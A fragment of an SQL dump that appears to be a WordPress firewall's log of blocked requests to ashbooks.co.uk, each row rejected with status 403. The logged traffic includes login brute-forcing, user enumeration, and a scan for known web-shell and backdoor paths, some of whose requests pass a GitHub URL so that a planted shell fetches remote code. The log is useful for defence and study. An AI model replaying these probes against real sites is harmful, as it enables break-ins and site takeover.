Firefox\\/31.0\"}','SrBDkPQa3UVw2TJgfNqXivRI',0,1635979330.1083,422,'','POST',403,0,600,0,1,'',0),('185.191.34.215',3116311255,'','https://ashbooks.co.uk/wp-content/uploads/2019/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','eoruZysW457IRHb9wcOJ2jB8',0,1635985952.8816,427,'','POST',403,0,700,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','bfLZCAqPczXlw8O2nMkGINgE',0,1635989236.6534,486,'','POST',403,0,600,0,1,'',0),('69.30.240.26',1159655450,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident\\/5.0)\"}','C1de6SVl79Ppg3GMmRQc5WXN',0,1635991719.6200,497,'','POST',403,0,600,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','BeyGJVn9DQhK7jkzYsxUbo3A',0,1635991857.2785,413,'','POST',403,0,600,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','Gzu1M6CXgvhHW0dYUwZBefsb',0,1635994456.7715,3150,'','POST',403,0,600,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ZBUQcAWRsYymuE0d3FL5if2w',0,1635995833.0524,538,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','jpYNnkEZFGc4Uri8P3CKdbVg',0,1635995845.6752,473,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','54o3TNeJEdlinwtIPvjs896K',0,1635995858.9967,426,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','mSPjD0yARwzYqldcTXrUIoWV',0,1635995871.0005,442,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','uK13DN7JALmjMRZs4Vfd0YbI',0,1635995925.8691,490,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','1NdfMni4W6AuJmQGh23ZlRep',0,1635995938.3484,729,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','AEvRTBSJ59LIHnMXOKd0WV38',0,1635995952.0161,409,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','rESP4fCszeadm1ObKgNQj9Zl',0,1635995964.5468,606,'','GET',403,0,700,0,1,'',0),('3.96.204.29',56675357,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4240.193 Safari\\/537.36\"}','ACDah9bEP1UO0FZtfdgT7sen',0,1635995971.0528,541,'','GET',403,0,520,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','46bQdfvs79nNer3UYx1Wz5DJ',0,1635995991.7734,433,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','mq5VofExGJCT4F96Zr0YvReS',0,1635996002.8476,420,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','LsJmVKM9vP8hCtZyOzcndYN3',0,1635996017.0545,379,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','XTNlA4zu5LaPvmFGgoh7wdjs',0,1635996031.2534,401,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','igED8JAOx2aW9S1nulCe53yT',0,1635996042.6303,372,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ZtQg3zpBKJrmwRMjoP1IT0HD',0,1635996053.5808,354,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','dB3WK4kLmVGsavP6yruJUglD',0,1635996065.4908,399,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','tiAN9TWMHmkrC4cg2Y6uG1ap',0,1635996079.9369,429,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','d4fx2jXs36WKReHAUYmoQi0N',0,1635996094.7982,453,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Af8HUciMmua4zVF0WpvnYrRj',0,1635996110.3284,943,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','EGIJQLrZdg6eab72c0jUsBP4',0,1635996127.1644,415,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','hscnwHeIJE37TtRof6YpNl5v',0,1635996142.1962,658,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ZLU2ul536aTxsDbjGH1gKYVn',0,1635996154.6467,493,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','XVpoRWHulDFQA3KeYwb27rfy',0,1635996166.7209,518,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Zln0eEvfjpOUF9MBqLI8Wy1d',0,1635996179.4830,1004,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','yxgjTQZltRCHfP90dFWU41Dp',0,1635996189.4370,454,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','xvoGXzwl34ALJ5kYaUerujS7',0,1635996202.9705,453,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','uclX73In54LDf0WUEC2pRJw1',0,1635996215.4641,532,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','vF7V6tLHlRyJpxeE32sUW8fu',0,1635996223.8074,397,'','POST',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','sricjI0VWUhF5nwdyOSNfm1P',0,1635996235.9719,390,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Zna28w3g6MWjcXioydvNHeur',0,1635996247.5583,389,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','7CsWBKQYb8lxePMph4gIfOnm',0,1635996259.1285,468,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','6iSe1Jq2fz7Rb0yAMKXxaYhr',0,1635996271.1375,398,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','oBhjRtKI4L63fTrpZzlC7yNi',0,1635996285.8956,390,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','mTCPIxn8OSM6BFcyv9RQ1b3Z',0,1635996295.6786,407,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Nak8tI3j0dORnCG1eoWvPABQ',0,1635996306.8583,1044,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','xq4hswjIFZ6nr8W7tBuUfMeo',0,1635996320.0131,446,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Hy2MJKhVTdCNYOA74wQj5Zgc',0,1635996332.0576,774,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','cBobPnxS5hYTgzF76UvH0rRW',0,1635996344.9622,439,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','KMj2atSeoOEJT5UyG6Ag9B0b',0,1635996355.6918,441,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Miuh8NzQcE3GyrpjT4FOeAIs',0,1635996368.9982,416,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','8LBsFP3JRi9zOoZUkWxqwdM1',0,1635996380.1358,404,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','JgmAeM7Hjia09LKnTx3UVCDd',0,1635996390.5667,457,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','CozxtHZIAXp34vLJ0nFNSP9g',0,1635996404.0478,440,'','GET',403,0,700,0,1,'',0),('34.107.68.50',577455154,'','https://ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Ua78sQygYCd3ABfrVhOKxFk1',0,1635996419.3065,784,'','GET',403,0,700,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','VZa0rd7cwYLIBT4MxoWqCzhO',0,1635997233.1908,883,'','POST',403,0,600,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','04tTuCkIi9OXgYaW7J3fGHsq',0,1635999892.3298,643,'','POST',403,0,600,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','9l8s61jFUYxna5OytDAiKGMQ',0,1636002708.5521,713,'','POST',403,0,600,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','jhDPT34L8yQoOzVGZMf6tsra',0,1636005699.0901,444,'','POST',403,0,600,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','OXCrmz0xUAJQM8k12sbpVZiB',0,1636008745.7045,494,'','POST',403,0,600,0,1,'',0),('69.30.231.157',1159653277,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.75.14 (KHTML, like Gecko) Version\\/7.0.3 Safari\\/537.75.14\"}','z7B4yEPxLWcYDdrbQkJm1afR',0,1636009547.3950,191,'','POST',403,0,600,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','WjufZBQiyhLStnKpEr9U1RVx',0,1636012521.5218,474,'','POST',403,0,600,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','aK8uHSWU4yTtPIBV5Y9wfb1M',0,1636015554.9013,482,'','POST',403,0,600,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','s8ScvF6w2t4D035bGAyplVKL',0,1636018714.1923,538,'','POST',403,0,600,0,1,'',0),('192.187.118.203',3233511115,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.1 (KHTML, like Gecko) GSA\\/4.1.0.31802 Mobile\\/11D257 Safari\\/9537.53\"}','4HGtUw1E3VIdl9s2yBCrT7Kh',0,1636021671.9274,427,'','POST',403,0,600,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','ldu16q9z3cWE8xm7jnsHRhaC',0,1636021863.9533,444,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','jnaRk1KiMftITyoqlLJ7eZP5',0,1636024422.4155,485,'','POST',403,0,600,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','TEOwe9qXgIrv2zny1CQZsS5W',0,1636025051.7427,536,'','POST',403,0,600,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','RvBap48Uw2YZucMNnkSsl5X0',0,1636028145.0400,472,'','POST',403,0,600,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','1tnkyqDWOixM0lf2QbhFHUIm',0,1636031283.5531,571,'','POST',403,0,600,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','IQaF9g8rspuZPAtbhjXy0Hvi',0,1636034516.7759,598,'','POST',403,0,600,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','HrJhz9Nb4160dQLIUYAsq5m8',0,1636037758.2297,531,'','POST',403,0,600,0,1,'',0),('82.208.189.233',1389411817,'','https://ashbooks.co.uk/xmrlpc.php?daksldlkdsadas=1','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko\\/20100101 Firefox\\/49.0\"}','Ev8LXJd2yH7rf0jqBxeF6ma3',0,1636040698.3331,497,'','GET',403,0,700,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','tk1y4NIhCz0GKl2mQsv7SPYw',0,1636040965.4912,526,'','POST',403,0,600,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','etYK3JAE5WjaGrcTR4FCwPUv',0,1636044226.4960,523,'','POST',403,0,600,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','PbJrfntjlwcqYTUsMyKdVxBi',0,1636047431.8744,509,'','POST',403,0,600,0,1,'',0),('91.242.162.35',1542627875,'','https://www.ashbooks.co.uk/weblog/index.php?p=130','','{\"1\":\"Mozilla\\/5.0 (compatible; Qwantify\\/2.4w; +https:\\/\\/www.qwant.com\\/)\"}','OaTFB3vj8Y9eCqGucLKibdwA',0,1636048635.4051,204,'','GET',403,0,700,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','gq6O9JtFIinz1pUodLbr5u2f',0,1636050686.3548,458,'','POST',403,0,600,0,1,'',0),('40.122.130.155',679117467,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','qavZo4pmrLde6Qn8tGKhu02y',0,1636052320.1539,419,'','GET',403,0,520,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','puKR6qs02vTx98mlgWEAYLUn',0,1636053877.4575,478,'','POST',403,0,600,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','Z7ztWbo1Bnk85QGeCxSsOh9R',0,1636057106.8152,640,'','POST',403,0,600,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','29gGdWNyc5AxzY4m863DSJtv',0,1636060326.2994,519,'','POST',403,0,600,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','ZIA4Dsw8l9zHGxaK6U7e3oh0',0,1636063554.7286,470,'','POST',403,0,600,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','k9rTvcO0FmGjtKuspHCiE3Bx',0,1636066710.8875,458,'','POST',403,0,600,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','tUy4uhnwCRQV6rilHKeD7pJY',0,1636069893.6645,491,'','POST',403,0,600,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','rMwE5jPhkI0ubmzGDOoeBLai',0,1636073111.0138,495,'','POST',403,0,600,0,1,'',0),('20.106.201.72',342542664,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','RvtWfmesM0bKPjxDYnazq4UI',0,1636076359.2996,526,'','POST',403,0,600,0,1,'',0),('192.187.118.203',3233511115,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','tLXaTsIUdcWovFPJir8KnbpH',0,1636082136.1180,545,'','POST',403,0,600,0,1,'',0),('86.104.39.238',1449666542,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','hVg0vwTsmKD7PHXiuCltLJSc',0,1636093602.5724,422,'','GET',403,0,520,0,1,'',0),('176.107.128.162',2959835298,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','4kSQAtsbYyJzGxCMUrITXHdj',0,1636096262.7877,3084,'','GET',403,0,520,0,1,'',0),('155.133.129.13',2609217805,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','hnDVCs4t29cTvpw6fYSPkXl3',0,1636100321.8594,485,'','POST',403,0,600,0,1,'',0),('104.248.157.130',1761123714,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 